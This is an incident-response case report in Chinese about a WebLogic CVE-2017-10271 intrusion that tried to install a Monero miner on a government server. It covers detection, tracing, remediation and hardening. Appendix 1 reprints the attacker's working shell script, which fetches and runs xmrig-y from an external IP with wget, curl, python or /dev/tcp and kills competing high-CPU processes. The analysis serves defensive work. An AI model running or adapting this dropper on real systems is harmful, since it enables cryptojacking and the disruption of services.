WebLogic 中间件高危漏洞应急响应案例分享

一、事件概述

2018年1月2日8点30分，某省级单位联网直报系统页面突发无法访问。经排查，服务器出现异常命令执行记录：攻击者利用系统漏洞结束了关键进程，并尝试从境外服务器下载病毒程序。经过紧急应急处置，事件得到有效控制，系统恢复正常。分析结果显示，事件源于WebLogic中间件存在高危远程代码执行漏洞。

二、事件检测与分析过程

应急服务团队迅速介入，按照标准流程开展检测与分析：

1. 异常行为确认

• 检查系统日志，发现恶意 history 命令执行记录。
• 攻击脚本主要功能：
  • 下载器功能：尝试通过 wget、curl、python 等工具，从境外IP 165.227.215.25 下载 xmrig-y 文件。
  • 进程清除功能：通过 killer() 函数，结束高CPU进程。
  • 运行器功能：下载病毒程序后，赋予权限并运行。
• 病毒样本 xmrig-y 被分析为加密货币挖矿程序（门罗币Monero），会创建伪装文件（如 /tmp/EB93A6/996E.elf），消耗服务器资源进行非法挖矿。

2. 攻击路径溯源

• 登录审计：last 登录记录无异常，排除弱口令爆破等手段。
• 漏洞定位：服务器使用 Oracle WebLogic Server 10.3.6.0，存在已知高危远程代码执行漏洞（CVE-2017-10271），攻击者可通过 wls-wsat 组件远程执行任意命令。
• 防护设备日志分析：WAF日志初查无异常，手动更新特征库后发现针对 wls-wsat 的攻击行为。防火墙特征库未及时生效，攻击未被拦截。

三、事件定性

本次事件为 利用WebLogic中间件已知高危漏洞发起的远程代码执行攻击。攻击者通过漏洞控制服务器，主要目的是：

• 下载并运行挖矿程序，非法牟利
• 清除竞争资源的进程，导致业务系统服务中断

四、应急处置与修复措施

应急处置团队采取了以下措施：

1. 抑制与根除

• 服务器网络策略禁止主动外连，病毒程序未能成功下载，有效避免财产损失。
• 彻底根除隐患，强烈建议立即安装WebLogic安全补丁。
• 如无法立刻打补丁，可临时删除易受攻击组件：

rm -rf /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

删除后重启WebLogic，并访问 http://[域名或IP]/wls-wsat/CoordinatorPortType 验证返回404。

2. 系统恢复与加固

• 全面病毒查杀，确认无残留恶意程序。
• 修复漏洞后重启服务，系统恢复正常。
• 安全加固：在 /etc/profile 添加 export HISTTIMEFORMAT='%F %T '，让 history 记录详细时间，便于审计溯源。

五、事件总结与改进建议

本次事件暴露出软件资产和漏洞管理短板：对中间件等基础软件的漏洞情报关注不足，补丁更新流程不及时。WAF等防护设备特征库更新滞后，难以防御最新漏洞利用。

改进建议

1. 建立严格的漏洞补丁管理机制
   定期关注官方安全公告，建立软件台账，制定补丁测试与更新计划。
2. 实施纵深防御策略
   结合网络层防火墙、主机安全（EDR）、应用层WAF等，构建多层防护体系。
3. 加强安全监控与日志审计
   确保安全设备日志功能正常并集中管理，及时发现异常行为，完善系统操作审计。
4. 最小权限原则
   应用和服务器运行最小权限，避免高权限账户，限制漏洞利用影响范围。

附录1：被执行的攻击命令示例

downloader () { if checkCmd wget; then wget $1 -O $2 ; elif checkCmd curl; then curl $1 -o $2; elif checkCmd python; then if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; else python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; fi; else cat < /dev/tcp/165.227.215.25/5555 > $2; fi; chmod +x $2; } killer() { for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do if [ $tmpVar = $sPid ]; then continue; fi; if [ $tmpVar = $mPid ]; then continue; fi; if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep java` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep sh` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep bash` ]; then continue; fi; kill -9 $tmpVar; rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`; fi; done; } runer() { if [ -z "$mPid" ]; then if [ ! -f $mName ]; then downloader http://165.227.215.25/xmrig-y $mName; fi; chmod +x ./$mName; ./$mName; fi; mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`; } 

附录2：wls-wsat 组件漏洞说明

• wls-wsat 组件存在XMLDecoder反序列化远程代码执行漏洞，典型为 CVE-2017-10271。
• 攻击者可通过发送恶意XML包，在未授权情况下远程执行任意系统命令，完全控制目标服务器。

核心漏洞详情

漏洞原理

wls-wsat 是 Oracle WebLogic Server 的 WLS Security 组件，用于WebService服务。该组件在处理SOAP请求时，使用XMLDecoder类解析XML数据，未校验输入安全，攻击者可构造恶意XML触发反序列化，执行任意Java代码或系统命令。

影响版本

• Oracle WebLogic Server 10.3.6.0.0
• Oracle WebLogic Server 12.1.3.0.0
• Oracle WebLogic Server 12.2.1.1.0
• Oracle WebLogic Server 12.2.1.2.0

漏洞利用方式

攻击者通常通过POST请求访问 /wls-wsat/CoordinatorPortType，发送恶意XML payload，即可远程代码执行。利用难度低，相关PoC已公开。